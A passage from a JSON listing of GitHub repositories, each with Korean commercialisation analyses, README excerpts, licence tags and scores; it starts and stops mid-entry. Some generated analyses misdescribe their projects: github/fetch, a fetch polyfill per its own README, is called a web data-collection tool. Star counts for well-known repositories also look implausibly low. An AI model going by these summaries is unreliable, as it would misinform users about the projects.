[Python安全指南](./Python安全指南.md)         | 2021-05-18   |\n\n\n## 实践\n代码安全指引可用于以下场景：\n- 开发人员日常参考\n- 编写安全系统扫描策略\n- 安全组件开发\n- 漏洞修复指引\n\n\n## 贡献\n\n盼与社区携手，一道维护完善。欢迎提交修订建议，详参阅[贡献指南](./CONTRIBUTING.md)。\n\n\n\n## 授权许可\n\nSecure Coding Guide by THL A29 Limited, a Tencent company, is licensed under [CC BY 4.0](https://creativecommons.org/licenses/by-sa/4.0/).\n","composite_score":0.578,"license_safety_tag":"unknown"},{"name":"xingyizhou/CenterNet","github_url":"https://github.com/xingyizhou/CenterNet","stars":8,"language":"Python","license":"MIT","abandonment_months":39,"description":"# CenterNet 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체의 위치를 자동으로 찾아내는 AI 기술로, 보안카메라, 자동운전, 물류 자동화 등 실생활에 광범위하게 적용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소매점의 고객 흐름 분석 및 보안 모니터링 솔루션으로 제공\n2. **내부 업무 도구**: 물류센터의 ","readme_excerpt":"# Objects as Points\nObject detection, 3D detection, and pose estimation using center point detection:\n![](readme/fig2.png)\n> [**Objects as Points**](http://arxiv.org/abs/1904.07850),            \n> Xingyi Zhou, Dequan Wang, Philipp Kr&auml;henb&uuml;hl,        \n> *arXiv technical report ([arXiv 1904.07850](http://arxiv.org/abs/1904.07850))*         \n\n\nContact: [zhouxy2017@gmail.com](mailto:zhouxy2017@gmail.com). Any questions or discussions are welcomed! \n\n## Updates\n\n - (June, 2020) We released a state-of-the-art Lidar-based 3D detection and tracking framework [CenterPoint](https://github.com/tianweiy/CenterPoint).\n - (April, 2020) We released a state-of-the-art (multi-category-/ pose-/ 3d-) tracking extension [CenterTrack](https://github.com/xingyizhou/CenterTrack).\n\n## Abstract \n\nDetection identifies objects as axis-aligned boxes in an image. Most successful object detectors enumerate a nearly exhaustive list of potential object locations and classify each. This is wasteful, ineffici","composite_score":0.5776,"license_safety_tag":"safe"},{"name":"amusi/awesome-object-detection","github_url":"https://github.com/amusi/awesome-object-detection","stars":5,"language":"","license":"unknown","abandonment_months":42,"description":"# amusi/awesome-object-detection 분석\n\n## 왜 보물인가\n사진이나 영상에서 사물을 자동으로 찾아내는 기술들을 한곳에 모아놓은 학습 자료로, 관련 분야 개발자들의 필수 참고서입니다.\n\n## 어디에 쓸 수 있나\n- **보안 CCTV 서비스**: 침입자나 위험 물체를 자동으로 감지하는 모니터링 솔루션\n- **자동차 부품사 내부 도구**","readme_excerpt":"# object-detection\r\n\r\n[TOC]\r\n\r\nThis is a list of awesome articles about object detection. If you want to read the paper according to time, you can refer to [Date](Date.md).\r\n\r\n- R-CNN\r\n- Fast R-CNN\r\n- Faster R-CNN\r\n- Mask R-CNN\r\n- Light-Head R-CNN\r\n- Cascade R-CNN\r\n- SPP-Net\r\n- YOLO\r\n- YOLOv2\r\n- YOLOv3\r\n- YOLT\r\n- SSD\r\n- DSSD\r\n- FSSD\r\n- ESSD\r\n- MDSSD\r\n- Pelee\r\n- Fire SSD\r\n- R-FCN\r\n- FPN\r\n- DSOD\r\n- RetinaNet\r\n- MegDet\r\n- RefineNet\r\n- DetNet\r\n- SSOD\r\n- CornerNet\r\n- M2Det\r\n- 3D Object Detection\r\n- ZSD（Zero-Shot Object Detection）\r\n- OSD（One-Shot object Detection）\r\n- Weakly Supervised Object Detection\r\n- Softer-NMS\r\n- 2018\r\n- 2019\r\n- Other\r\n\r\nBased on handong1587's github: https://handong1587.github.io/deep_learning/2015/10/09/object-detection.html\r\n\r\n# Survey\r\n\r\n**Imbalance Problems in Object Detection: A Review**\r\n\r\n- intro: under review at TPAMI\r\n- arXiv: <https://arxiv.org/abs/1909.00169>\r\n\r\n**Recent Advances in Deep Learning for Object Detection**\r\n\r\n- intro: From 2013 (OverFeat) to 201","composite_score":0.577,"license_safety_tag":"unknown"},{"name":"gyf-dev/ImmersionBar","github_url":"https://github.com/gyf-dev/ImmersionBar","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":51,"description":"# ImmersionBar 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 상단 상태표시줄을 자유롭게 디자인할 수 있는 도구로, 앱의 외형을 더 세련되게 만들어주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 디자인 자동화 플랫폼에서 상태표시줄 커스터마이징 기능으로 제공\n2. **내부 업무 도구**: 기업용 앱 개발사가 자","readme_excerpt":"![logo](https://github.com/gyf-dev/Screenshots/blob/master/ImmersionBar/readme_head.png)\n# ImmersionBar -- android 4.4以上沉浸式实现 \n[![version](https://img.shields.io/badge/version-3.2.2-brightgreen.svg)](https://bintray.com/geyifeng/maven/immersionbar) [![author](https://img.shields.io/badge/author-gyf--dev-orange.svg)](https://github.com/gyf-dev) [![简书](https://img.shields.io/badge/%E7%AE%80%E4%B9%A6-HeLe%E5%B0%8F%E5%AD%90%E6%8B%BD-blue.svg)](https://www.jianshu.com/p/2a884e211a62) [![QQ群](https://img.shields.io/badge/QQ%E7%BE%A4-314360549-red.svg)]()\n\n## 直接看效果图，建议下载demo体验，最下面有各个版本的效果图\n<img width=\"300\"  src=\"https://github.com/gyf-dev/Screenshots/blob/master/ImmersionBar/Screenshot_6.0.gif\"/>\n\n## 使用（gyf替换为geyifeng） \n> 3.1.1以上版本(mavenCentral)\n   ```groovy\n   // 基础依赖包，必须要依赖\n   implementation 'com.geyifeng.immersionbar:immersionbar:3.2.2'\n   // kotlin扩展（可选）\n   implementation 'com.geyifeng.immersionbar:immersionbar-ktx:3.2.2'\n   // fragment快速实现（可选）已废弃\n   implementation 'com.geyifeng.immersion","composite_score":0.5769,"license_safety_tag":"safe"},{"name":"LondheShubham153/django-todo-cicd","github_url":"https://github.com/LondheShubham153/django-todo-cicd","stars":103,"language":"Python","license":"Apache-2.0","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.5766,"license_safety_tag":"safe"},{"name":"quantopian/pyfolio","github_url":"https://github.com/quantopian/pyfolio","stars":9,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":29,"description":"# PyFolio 프로젝트 분석\n\n## 왜 보물인가\n투자 수익률을 자동으로 분석하고 성과를 시각화해주는 도구로, 개인 투자자부터 펀드매니저까지 자신의 투자 결과를 과학적으로 평가할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **투자 성과 분석 SaaS**: 개인투자자를 위한 월 구독형 포트폴리오 분석 웹서비스\n2. **증권사 내부 도구**: 펀드매니저가","readme_excerpt":"![pyfolio](https://media.quantopian.com/logos/open_source/pyfolio-logo-03.png \"pyfolio\")\n\n# pyfolio\n\n[![Join the chat at https://gitter.im/quantopian/pyfolio](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/quantopian/pyfolio?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![build status](https://travis-ci.org/quantopian/pyfolio.png?branch=master)](https://travis-ci.org/quantopian/pyfolio)\n\npyfolio is a Python library for performance and risk analysis of\nfinancial portfolios developed by\n[Quantopian Inc](https://www.quantopian.com). It works well with the\n[Zipline](https://www.zipline.io/) open source backtesting library.\nQuantopian also offers a [fully managed service for professionals](https://factset.quantopian.com) \nthat includes Zipline, Alphalens, Pyfolio, FactSet data, and more.\n\nAt the core of pyfolio is a so-called tear sheet that consists of\nvarious individual plots that provide a comprehensive image of the\nperformance of a trading alg","composite_score":0.5755,"license_safety_tag":"safe"},{"name":"halfrost/Halfrost-Field","github_url":"https://github.com/halfrost/Halfrost-Field","stars":8,"language":"Go","license":"CC-BY-SA-4.0","abandonment_months":29,"description":"# Halfrost-Field 저장소 분석\n\n## 왜 보물인가\niOS 앱 개발과 웹 기술에 대한 체계적인 학습 자료와 예제 코드를 한곳에 모아놓은 개발자 교육용 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초급 개발자 대상 iOS/웹 개발 강좌 제공 서비스\n2. **기업 내부 교육**: 신입 개발자 온보딩 및 기술 스터디 자료","readme_excerpt":"# Halfrost-Field 冰霜之地\n\n<p align='center'>\n<img src='contents/images/background-cover_.png'>\n</p>\n\n<p align='center'>\n<img src=\"https://img.shields.io/badge/Total%20Reading-3.18M-success\">\n<img src=\"https://img.shields.io/badge/Total%20Word%20Count-578129-success\">\n<img src=\"https://img.shields.io/badge/build-passing-brightgreen.svg\">\n<img src=\"https://img.shields.io/badge/platform-%20iOS | Android | Mac | Web%20-ff69b4.svg\">\n<img src=\"https://img.shields.io/badge/language-Objective--C-orange.svg\">\n<img src=\"https://img.shields.io/badge/language-Swift-abcdef.svg\">\n<img src=\"https://img.shields.io/badge/language-JavaScript-yellow.svg\">\n<img src=\"https://img.shields.io/badge/language-Golang-26C2F0.svg\">\n<img src=\"https://visitor-badge.laobi.icu/badge?page_id=halfrost.Halfrost-Field\" alt=\"visitor badge\"/>  \n</p>\n\n<p align='center'>\n<a href=\"https://github.com/halfrost/Halfrost-Field/blob/master/LICENSE\"><img alt=\"GitHub\" src=\"https://img.shields.io/github/license/halfrost/Halfrost-Field?la","composite_score":0.5754,"license_safety_tag":"unknown"},{"name":"BcRikko/NES.css","github_url":"https://github.com/BcRikko/NES.css","stars":383,"language":"SCSS","license":"MIT","abandonment_months":29,"description":"# NES.css 상업화 분석\n\n## 왜 보물인가\n복고풍 게임 느낌의 디자인을 쉽게 만들 수 있는 도구로, 레트로 감성을 원하는 웹사이트들 사이에서 빠르게 인기를 얻고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 복고 게임풍 UI 빌더를 제공하는 웹 제작 플랫폼 (예: 80년대 스타일 개인 포트폴리오 자동 생성 서비스)\n2. **내","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://nostalgic-css.github.io/NES.css/\" target=\"_blank\"><img src=\"https://user-images.githubusercontent.com/5305599/49061716-da649680-f254-11e8-9a89-d95a7407ec6a.png\" alt=\"NES.css: NES-style  CSS framework\" style=\"max-width: 100%;\" width=\"600\" height=\"315\"></a>\n\n  <a href=\".github/README-jp.md\">日本語</a> / <a href=\".github/README-zh-CN.md\">简体中文</a> / <a href=\".github/README-es.md\">Español</a> / <a href=\".github/README-pt-BR.md\">Português</a> / <a href=\".github/README-ru.md\">Русский</a> / <a href=\".github/README-fr.md\">Français</a>\n</div>\n\nNES.css is a **NES-style(8bit-like)** CSS Framework.\n\n[![Gitter][gitter-badge]][gitter] [![Commitizen friendly][commitizen-badge]][commitizen]\n\n## Installation\n\n### Styles\n\nNES.css is available via either npm (preferred), Yarn, or a CDN.\n\n#### via package manager\n\n```shell\nnpm install nes.css\n# or\nyarn add nes.css\n```\n\nOur `package.json` contains some additional metadata under the following keys:\n* `sass` - path to our ","composite_score":0.5753,"license_safety_tag":"safe"},{"name":"offensive-security/exploitdb","github_url":"https://github.com/offensive-security/exploitdb","stars":9,"language":"","license":"GPL-2.0","abandonment_months":43,"description":"# ExploitDB 저장소 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 실제로 사용하는 해킹 기법과 방어법의 거대한 데이터베이스로, 기업의 시스템 취약점을 찾아내는 데 필수적인 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 진단 SaaS 서비스**: 기업의 정보시스템을 검사하고 문제점을 찾아주는 온라인 서비스에 ExploitDB 데이터를","readme_excerpt":"New repo can be found here: <https://gitlab.com/exploit-database/exploitdb>\n","composite_score":0.5753,"license_safety_tag":"restricted"},{"name":"tychxn/jd-assistant","github_url":"https://github.com/tychxn/jd-assistant","stars":6,"language":"Python","license":"MIT","abandonment_months":29,"description":"# jd-assistant 사업화 분석\n\n## 왜 보물인가\n온라인 쇼핑 자동화로 수동 구매 과정을 없애 시간을 절약해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 자동 구매 대행 플랫폼으로 일반 소비자에게 판매\n- **내부 업무 도구**: 대량 상품 구매가 필요한 기업의 조달팀이 효율성 향상용으로 사용\n- **","readme_excerpt":"# JD-Assistant\n\n[![version](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/download/releases/3.4.0/) \n[![status](https://img.shields.io/badge/status-stable-green.svg)](https://github.com/tychxn/jd-assistant)\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](./LICENSE)\n[![star, issue](https://img.shields.io/badge/star%2C%20issue-welcome-brightgreen.svg)](https://github.com/tychxn/jd-assistant)\n\n京东抢购助手（短期内不再更新）\n\n## 主要功能\n\n- 登陆京东商城（[www.jd.com](http://www.jd.com/)）\n  - 手机扫码登录\n  - 保存/加载登录cookies (可验证cookies是否过期)\n- 商品查询操作\n  - 提供完整的[`地址⇔ID`](./area_id/)对应关系\n  - 根据商品ID和地址ID查询库存\n  - 根据商品ID查询价格\n- 购物车操作\n  - 清空/添加购物车 (无货商品也可以加入购物车，预约商品无法加入)\n  - 获取购物车商品详情\n- 订单操作\n  - 获取订单结算页面信息 (商品详情, 应付总额, 收货地址, 收货人等)\n  - 提交订单（使用默认地址）\n    - 直接提交\n    - 有货提交\n    - 定时提交\n  - 查询订单 (可选择只显示未付款订单)\n- 其他\n  - 商品预约\n  - 用户信息查询\n\n## 运行环境\n\n- [Python 3](https://www.python.org/)\n\n## 第三方库\n\n- [Requests](http://docs.python-requests.org/en/master/)\n- [Beautiful Soup](https://www.crummy.com/softw","composite_score":0.575,"license_safety_tag":"safe"},{"name":"salomonelli/best-resume-ever","github_url":"https://github.com/salomonelli/best-resume-ever","stars":6,"language":"Vue","license":"mit","abandonment_months":24,"description":"# best-resume-ever 평가 보고서\n\n## 왜 보물인가\n이력서를 자동으로 예쁘게 만들어주는 도구로, 취업 준비생들이 디자인 고민 없이 전문적인 이력서를 빠르게 완성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이력서 자동 생성 SaaS 서비스**\n구직자들이 월 5,000원을 내고 이력서 템플릿을 선택해 자동으로 예쁜 이력서를 만드는 웹 ","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://github.com/salomonelli/best-resume-ever\">\n  <img src=\"src/assets/logo.png\" alt=\"Markdownify\" width=\"200\"></a>\n  <br>\n  best-resume-ever\n  <br>\n</h1>\n\n<div align=\"center\">\n\n[![Travis badge](https://travis-ci.org/salomonelli/best-resume-ever.svg?branch=master)](https://travis-ci.org/salomonelli/best-resume-ever)\n\n</div>\n\n<h4 align=\"center\">\n  :necktie: :briefcase: Build fast :rocket: and easy multiple beautiful resumes and create your best CV ever!\n  <br><br>\n  Made with Vue and LESS.\n</h4>\n\n<br>\n<br>\n\n<p align=\"left\">\n<p>Cool<br>\n<img src=\"src/assets/preview/resume-cool.png\" width=\"150\" style=\"margin-right:5px; border: 1px solid #ccc;\" />\n<img src=\"src/assets/preview/resume-cool-rtl2.png\" width=\"150\" style=\"margin-right:5px; border: 1px solid #ccc;\" />\n<img src=\"src/assets/preview/resume-cool-rtl.png\" width=\"150\" style=\"margin-right:5px; border: 1px solid #ccc;\" />\n</p>\n<p>Creative<br>\n<img src=\"src/assets/preview/resume-creative.png\" width=","composite_score":0.5736,"license_safety_tag":"safe"},{"name":"github/fetch","github_url":"https://github.com/github/fetch","stars":6,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# github/fetch 상용화 분석\n\n## 왜 보물인가\n인터넷에서 필요한 정보를 자동으로 수집하고 정리해주는 도구로, 반복적인 데이터 수집 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 가격 변동을 자동 추적하고 고객에게 알림을 보내는 가격 모니터링 플랫폼\n- **내부 업무 도구**: 뉴스, 채용공고, ","readme_excerpt":"# window.fetch polyfill\n\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/JakeChampion/fetch/badge)](https://securityscorecards.dev/viewer/?uri=github.com/JakeChampion/fetch)\n\nThe `fetch()` function is a Promise-based mechanism for programmatically making\nweb requests in the browser. This project is a polyfill that implements a subset\nof the standard [Fetch specification][], enough to make `fetch` a viable\nreplacement for most uses of XMLHttpRequest in traditional web applications.\n\n## Table of Contents\n\n* [Read this first](#read-this-first)\n* [Installation](#installation)\n* [Usage](#usage)\n  * [Importing](#importing)\n  * [HTML](#html)\n  * [JSON](#json)\n  * [Response metadata](#response-metadata)\n  * [Post form](#post-form)\n  * [Post JSON](#post-json)\n  * [File upload](#file-upload)\n  * [Caveats](#caveats)\n    * [Handling HTTP error statuses](#handling-http-error-statuses)\n    * [Sending cookies](#sending-cookies)\n    * [Receiving cookies](#receiving-cookies","composite_score":0.5726,"license_safety_tag":"safe"},{"name":"sapegin/jest-cheat-sheet","github_url":"https://github.com/sapegin/jest-cheat-sheet","stars":5,"language":"","license":"CC0-1.0","abandonment_months":19,"description":"# Jest 치트시트 (jest-cheat-sheet) 상용화 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 매일 반복하는 테스트 작업을 빠르게 학습하고 참고할 수 있는 실용적인 가이드북이다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 교육 플랫폼**: 프로그래밍 학습자들을 위한 유료 강의 콘텐츠로 판매\n2. **기업 내부 도구**: 새 직원 온보딩 시 회","readme_excerpt":"<!--\nTo update TOC run:\n  npx markdown-toc --maxdepth 3 -i Readme.md\n\nTo reformat run:\n  npx prettier --print-width 100 --single-quote --no-semi --prose-wrap never --write Readme.md\n-->\n\n<div align=\"center\" markdown=\"1\">\n\n<img src=\"https://raw.githubusercontent.com/facebook/jest/main/website/static/img/jest-readme-headline.png\" width=\"200\">\n\n<h1>Jest cheat sheet</h1>\n\n</div>\n\n_Migrating to Vitest? [Check out Vitest cheat sheet](https://github.com/sapegin/vitest-cheat-sheet)._\n\n_I recommend [Mrm](https://github.com/sapegin/mrm/tree/master/packages/mrm-task-jest) and [jest-codemods](https://github.com/skovhus/jest-codemods) for single-command Jest installation and easy migration from other frameworks._\n\n[![Washing your code. A book on clean code for frontend developers](https://sapegin.me/images/washing-code-github.jpg)](https://sapegin.me/book/)\n\n## Table of contents\n\n<!-- toc -->\n\n- [Test structure](#test-structure)\n- [Matchers](#matchers)\n  - [Basic matchers](#basic-matchers)\n  - [Tru","composite_score":0.572,"license_safety_tag":"unknown"},{"name":"alibaba/vlayout","github_url":"https://github.com/alibaba/vlayout","stars":14,"language":"Java","license":"MIT","abandonment_months":59,"description":"# alibaba/vlayout 분석 보고서\n\n## 왜 보물인가\n앱이나 웹사이트의 화면 구성을 자유롭게 배치할 수 있는 도구로, 복잡한 레이아웃을 간단하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 목록, 추천 배너, 광고를 유연하게 배치하는 SaaS 서비스\n2. **뉴스/콘텐츠 앱**: 기사, 사진, 영상을 다양한","readme_excerpt":"# Attention. This project is not maintained any more !!!\n\n# vlayout\n\n[中文文档](README-ch.md)\n\n## Projects of Tangram\n\n### Android\n\n+ [Tangram-Android](https://github.com/alibaba/Tangram-Android)\n+ [Virtualview-Android](https://github.com/alibaba/Virtualview-Android)\n+ [vlayout](https://github.com/alibaba/vlayout)\n+ [UltraViewPager](https://github.com/alibaba/UltraViewPager)\n\n### iOS\n\n+ [Tangram-iOS](https://github.com/alibaba/Tangram-iOS)\n+ [Virtualview-iOS](https://github.com/alibaba/VirtualView-iOS)\n+ [LazyScrollView](https://github.com/alibaba/lazyscrollview)\n\nProject `vlayout` is a powerful LayoutManager extension for RecyclerView, it provides a group of layouts for RecyclerView. Make it able to handle a complicate situation when grid, list and other layouts in the same recyclerview.\n\n## Design\n\nBy providing a custom LayoutManager to RecyclerView, VirtualLayout is able to layout child views with different style at single view elegantly. The custom LayoutManager manages a serial of lay","composite_score":0.5718,"license_safety_tag":"safe"},{"name":"apache/incubator-weex","github_url":"https://github.com/apache/incubator-weex","stars":26,"language":"C++","license":"Apache-2.0","abandonment_months":61,"description":"# apache/incubator-weex 분석 보고서\n\n## 왜 보물인가\n스마트폰과 웹브라우저에서 동시에 작동하는 앱을 한 번에 만들 수 있는 기술로, 개발 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 SaaS**\n- 코드 없이 앱을 만들 수 있는 온라인 플랫폼으로 제공하여 소상공인 대상 구독 서비스화\n\n**2. ","readme_excerpt":"# Weex\n\nA framework for building Mobile cross-platform UI.\n\n[![Build Status](https://travis-ci.org/apache/incubator-weex.svg?branch=master)](https://travis-ci.org/apache/incubator-weex/)\n\n## Join Us\n**Join us through [mailing list](https://weex.apache.org/guide/contribute/how-to-contribute.html#mailing-list).**\n\n## Convenience Distribution \n**Since 0.28.0, Weex would publish two convince binary in each release for Android, please [read the documentation about the detail](major_change.html).**\n\n**Please take the above link seriously, otherwise you would be able to use the latest version of Weex.**\n\n| platform | status |\n| -------- | ------ |\n| Android | [sdk ![Download](https://api.bintray.com/packages/weex/Android/sdk/images/download.svg)](https://bintray.com/weex/Android/sdk/_latestVersion) Or [sdk_legacy ![Download](https://api.bintray.com/packages/weex/Android/sdk_legacy/images/download.svg)](https://bintray.com/weex/Android/sdk_legacy/_latestVersion) |\n| iOS | [![Pod version](https","composite_score":0.5717,"license_safety_tag":"safe"},{"name":"gotok8s/k8s-docker-desktop-for-mac","github_url":"https://github.com/gotok8s/k8s-docker-desktop-for-mac","stars":9,"language":"Batchfile","license":"MIT","abandonment_months":24,"description":"","readme_excerpt":"# `Docker Desktop for Mac` 开启并使用 `Kubernetes`\n\n[![github workflow](https://github.com/maguowei/k8s-docker-desktop-for-mac/workflows/k8s%20image%20sync/badge.svg)](https://github.com/maguowei/k8s-docker-desktop-for-mac/actions)\n\n`Docker Desktop` 可以方便的启用 `Kubernetes` 集群, 为学习 `Kubernetes` 提供了极大的便利, 但是由于众所周知的原因, 国内的网络下不能很方便的下载 `Kubernetes` 集群所需要的镜像, 导致集群启用失败. 这里提供了一个简单的方法, 利用 [GitHub Actions](https://developer.github.com/actions/creating-github-actions/) 实现 `k8s.gcr.io` 上 `kubernetes` 依赖镜像自动同步到 [Docker Hub](https://hub.docker.com/) 上指定的仓库中。 通过 [load_images.sh](./load_images.sh) 将所需镜像从 `Docker Hub` 的同步仓库中取回，并重新打上原始的`tag`. 镜像对应关系文件可以查看: [images](./images).\n\n说明:\n\n- 当前在 `Docker Desktop (Mac) Version 4.14.1 (Kubernetes: v1.25.2)`上经过测试可用\n- 使用 `Kubeadm` 在`Ubuntu`上安装 `Kubernetes` 请查看 [gotok8s](https://github.com/maguowei/gotok8s)\n\n## 安装并启动\n\n1. 下载安装 [Docker Desktop (Mac)](https://desktop.docker.com/mac/stable/Docker.dmg)\n\n2. 从 `Docker Hub` 的同步仓库中取回，并重新打上原始的`tag`.\n\n```bash\n./load_images.sh\n```\n\n3. 在","composite_score":0.5715,"license_safety_tag":"safe"},{"name":"tensorpack/tensorpack","github_url":"https://github.com/tensorpack/tensorpack","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":34,"description":"# Tensorpack 저장소 분석\n\n## 왜 보물인가\n사진이나 영상을 인식하는 인공지능 모델을 쉽게 만들고 학습시킬 수 있는 전문 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 이미징 SaaS**: 엑스레이나 CT 이미지를 분석해 질병을 자동으로 찾아내는 클라우드 서비스로 병원들에게 판매\n2. **자동 품질검사 시스템**: 공장 생산 제품의 결함","readme_excerpt":"![Tensorpack](https://github.com/tensorpack/tensorpack/raw/master/.github/tensorpack.png)\n\nTensorpack is a neural network training interface based on graph-mode TensorFlow.\n\n[![ReadTheDoc](https://readthedocs.org/projects/tensorpack/badge/?version=latest)](http://tensorpack.readthedocs.io)\n[![Gitter chat](https://img.shields.io/badge/chat-on%20gitter-46bc99.svg)](https://gitter.im/tensorpack/users)\n[![model-zoo](https://img.shields.io/badge/model-zoo-brightgreen.svg)](http://models.tensorpack.com)\n## Features:\n\nIt's Yet Another TF high-level API, with the following highlights:\n\n1. Focus on __training speed__.\n  + Speed comes for free with Tensorpack -- it uses TensorFlow in the __efficient way__ with no extra overhead.\n    On common CNNs, it runs training [1.2~5x faster](https://github.com/tensorpack/benchmarks/tree/master/other-wrappers) than the equivalent Keras code.\n    Your training can probably gets faster if written with Tensorpack.\n\n  + Scalable data-parallel multi-GPU / distri","composite_score":0.5713,"license_safety_tag":"safe"},{"name":"verekia/js-stack-from-scratch","github_url":"https://github.com/verekia/js-stack-from-scratch","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":24,"description":"# js-stack-from-scratch 분석\n\n## 왜 보물인가\n웹사이트를 만드는데 필요한 기초 기술들을 체계적으로 배울 수 있는 단계별 교육 자료로, 개발자 입문자들에게 실무 필수 기술을 전수하는 학습 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 유료 온라인 강좌나 부트캠프에서 커리큘럼 자료로 활용하거나 기업 개발팀의 신","readme_excerpt":"# JavaScript Stack from Scratch\n\n[![Build Status](https://travis-ci.org/verekia/js-stack-from-scratch.svg?branch=master)](https://travis-ci.org/verekia/js-stack-from-scratch)\n[![Release](https://img.shields.io/github/release/verekia/js-stack-from-scratch.svg?style=flat-square)](https://github.com/verekia/js-stack-from-scratch/releases)\n[![Gitter](https://img.shields.io/gitter/room/js-stack-from-scratch/Lobby.svg?style=flat-square)](https://gitter.im/js-stack-from-scratch/)\n\n[![React](/img/react-padded-90.png)](https://facebook.github.io/react/)\n[![Redux](/img/redux-padded-90.png)](http://redux.js.org/)\n[![React Router](/img/react-router-padded-90.png)](https://github.com/ReactTraining/react-router)\n[![Flow](/img/flow-padded-90.png)](https://flowtype.org/)\n[![ESLint](/img/eslint-padded-90.png)](http://eslint.org/)\n[![Jest](/img/jest-padded-90.png)](https://facebook.github.io/jest/)\n[![Yarn](/img/yarn-padded-90.png)](https://yarnpkg.com/)\n[![Webpack](/img/webpack-padded-90.png)](https://","composite_score":0.5713,"license_safety_tag":"safe"},{"name":"tobiasahlin/SpinKit","github_url":"https://github.com/tobiasahlin/SpinKit","stars":6,"language":"CSS","license":"mit","abandonment_months":71,"description":"# SpinKit 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 로딩 중임을 알려주는 애니메이션을 만드는 오픈소스로, 누구나 쉽게 가져다 쓸 수 있어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 분석 플랫폼이나 클라우드 저장소 같은 온라인 서비스에서 파일 업로드/처리 시 로딩 애니메이션 제공\n","readme_excerpt":"# [SpinKit](http://tobiasahlin.com/spinkit/)\n\nSimple loading spinners animated with CSS. See [demo](http://tobiasahlin.com/spinkit/). SpinKit only uses (`transform` and `opacity`) CSS animations to create smooth and easily customizable animations.\n\n## Usage\n\n- Add `spinkit.css` or `spinkit.min.css` to your project (or copy-paste the CSS that you need for your spinner—there are no dependencies between spinners, no shared classes, and no shared animations, etc, so it should be fairly straight-forward to extract only the code that you need)\n- Add a spinner to your project by copy-pasting HTML from `spinkit.css` or `examples.html`\n- Add the `sk-center` utility class to the spinner to center it (it sets `margin` to `auto`)\n- By default, the `width` and `height` of all spinners are set to `40px`. `background-color` is set to `#333`.\n- Configure the spinner by overwriting the CSS variables, primarily `--sk-size` (spinner width & height) and `--sk-color` (spinner color). If you need broader br","composite_score":0.5709,"license_safety_tag":"safe"},{"name":"Armour/vue-typescript-admin-template","github_url":"https://github.com/Armour/vue-typescript-admin-template","stars":5,"language":"Vue","license":"MIT","abandonment_months":31,"description":"# vue-typescript-admin-template 평가\n\n## 왜 보물인가\n웹사이트 관리자 화면을 빠르게 만들 수 있는 기본 틀(템플릿)로, 비용을 들이지 않고 전문가 수준의 구조를 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 계정 관리, 청구 현황, 데이터 분석 대시보드 화면 구축\n2. **내부 업무 도","readme_excerpt":"<p align=\"center\">\n  <img width=\"120\" src=\"public/img/icons/android-chrome-512x512.png\">\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/vuejs/vue\">\n    <img src=\"https://img.shields.io/badge/vue-2.6.10-brightgreen.svg\" alt=\"vue\">\n  </a>\n  <a href=\"https://github.com/ElemeFE/element\">\n    <img src=\"https://img.shields.io/badge/element--ui-2.15.1-brightgreen.svg\" alt=\"element-ui\">\n  </a>\n  <a href=\"https://circleci.com/gh/Armour/vue-typescript-admin-template/tree/master\">\n    <img src=\"https://circleci.com/gh/Armour/vue-typescript-admin-template/tree/master.svg?style=shield\" alt=\"CircleCI\">\n  </a>\n  <a href=\"http://makeapullrequest.com\">\n    <img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat\" alt=\"PRs Welcome\">\n  </a>\n  <a href=\"https://opensource.org/licenses/MIT\">\n    <img src=\"https://img.shields.io/badge/License-MIT-blue.svg\" alt=\"License: MIT\">\n  </a>\n  <a href=\"https://github.com/Armour/Jarvis\">\n    <img src=\"https://img.shields.io/badge/Hi-Jarvis","composite_score":0.5704,"license_safety_tag":"safe"},{"name":"CodeTips/BaiduNetdiskPlugin-macOS","github_url":"https://github.com/CodeTips/BaiduNetdiskPlugin-macOS","stars":9,"language":"Objective-C","license":"MIT","abandonment_months":68,"description":"","readme_excerpt":"# BaiduNetdiskPlugin-macOS\n\n![platform](https://img.shields.io/badge/platform-macos-lightgrey.svg)  [![GitHub 